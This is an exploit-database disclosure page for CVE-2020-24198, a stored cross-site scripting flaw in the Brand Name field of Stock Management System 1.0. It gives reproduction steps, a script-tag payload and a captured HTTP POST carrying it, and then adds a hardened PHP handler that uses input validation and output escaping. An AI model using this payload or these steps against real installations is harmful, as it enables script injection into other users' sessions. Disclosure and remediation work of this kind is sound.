Stock Management System 1.0 – Persistent Cross-Site Scripting (Brand Name) – CXSecurity.com

Vulnerability ID 2145289 Vulnerability type
Published 2020-09-05 Updated 2020-09-05
CVE ID CVE-2020-24198

CNNVD-ID N/A
Platform N/A CVSS score N/A
Source
https://cxsecurity.com/issue/WLB-2020090024
Details
Vulnerability details have not yet been disclosed
Exploit
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name)
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24198
# Date: September 4, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerability Details
# Description: A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function.
# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page where the Brand Name value is expected.
# Steps:
1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
2. Click "Brand"
3. Click "Action" in any brand name row
4. Click Edit
5. In "Brand Name" field enter XSS <script>alert(1)</script>
6. Click save changes
7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.
POST /stock/php_action/editBrand.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/brand.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
DNT: 1
Connection: close
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14
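Added example, not code from the Stock Management System project or from the advisory: a hardened form of the edit-brand handler and the brand list rendering, showing the two controls that close this stored XSS, allow-list validation of the editBrandName field on input and HTML escaping of the stored value on every output. The field names come from the captured request; the PDO handle, the table and column names, and the helper names h(), validateBrandName(), editBrand() and renderBrandRow() are assumptions.

```php
<?php
// Added example, not the project's own editBrand.php (which the advisory does not
// show). Field names match the captured request; table and column names, the PDO
// handle and the helper names are assumed.
declare(strict_types=1);

/** Escape a value for an HTML text node or quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Allow-list validation for a brand name; throws on anything unexpected. */
function validateBrandName(string $name): string
{
    $name = trim($name);
    if ($name === '' || mb_strlen($name, 'UTF-8') > 60) {
        throw new InvalidArgumentException('Brand name must be 1 to 60 characters.');
    }
    // Letters, digits, spaces, dots and hyphens only: no <, >, quotes or &.
    if (!preg_match('/^[\p{L}\p{N} .\-]+$/u', $name)) {
        throw new InvalidArgumentException('Brand name contains invalid characters.');
    }
    return $name;
}

/** Hardened edit handler: validate, then update with a prepared statement. */
function editBrand(PDO $pdo, array $post): array
{
    $brandId = filter_var($post['brandId'] ?? null, FILTER_VALIDATE_INT);
    $status  = filter_var($post['editBrandStatus'] ?? null, FILTER_VALIDATE_INT);
    if ($brandId === false || $status === false) {
        return ['success' => false, 'messages' => 'Invalid brand id or status.'];
    }
    try {
        $name = validateBrandName((string) ($post['editBrandName'] ?? ''));
    } catch (InvalidArgumentException $e) {
        return ['success' => false, 'messages' => $e->getMessage()];
    }
    $stmt = $pdo->prepare('UPDATE brand SET brand_name = :name, brand_active = :status WHERE brand_id = :id');
    $stmt->execute([':name' => $name, ':status' => $status, ':id' => $brandId]);
    return ['success' => true, 'messages' => 'Brand updated.'];
}

/** Output side: escape on render so even a legacy row holding markup shows as text. */
function renderBrandRow(array $row): string
{
    return '<tr><td>' . h($row['brand_name']) . '</td><td>' . h((string) $row['brand_active']) . '</td></tr>';
}
// Constructed check with the payload from the captured request: rendered as text, not executed.
echo renderBrandRow(['brand_name' => '<script>alert("hyd3sec")</script>', 'brand_active' => 1]), PHP_EOL;
```

Escaping at output is the control that protects rows already stored before the fix; the input allow-list additionally stops the value from being saved at all.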